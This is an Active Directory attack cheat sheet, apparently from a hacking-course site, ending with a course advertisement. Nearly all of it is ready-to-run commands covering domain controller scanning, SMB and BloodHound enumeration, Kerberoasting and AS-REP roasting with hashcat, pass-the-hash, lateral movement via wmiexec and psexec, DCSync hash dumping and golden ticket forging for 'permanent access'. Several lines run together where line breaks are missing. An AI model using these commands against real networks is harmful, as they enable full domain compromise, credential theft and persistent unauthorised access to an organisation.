Active Directory is used by 90%+ of enterprise networks. Compromising AD = owning the entire company.
# Without credentials
nmap -p 389,636,88,445 10.10.10.0/24 # Find domain controllers
enum4linux -a 10.10.10.5 # SMB enumeration
crackmapexec smb 10.10.10.0/24 # SMB scanning# BloodHound — Map AD attack paths
bloodhound-python -u user -p pass -ns DC_IP -d domain.com -c all
# PowerView enumeration
Get-DomainUser | Select samaccountname,memberof
Get-DomainGroup "Domain Admins" | Select member
Find-LocalAdminAccessGetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
hashcat -m 13100 hashes.txt wordlist.txtGetNPUsers.py domain/ -dc-ip DC_IP -usersfile users.txt -no-pass
hashcat -m 18200 hashes.txt wordlist.txt# Pass-the-Hash
crackmapexec smb 10.10.10.0/24 -u admin -H hash --sam
# WMIExec
wmiexec.py domain/admin@target -hashes :ntlmhash
# PSExec
psexec.py domain/admin:pass@target# DCSync — dump all domain hashes
secretsdump.py domain/admin:pass@DC_IP
# Golden Ticket — permanent access
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXX -domain domain.com adminSubscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!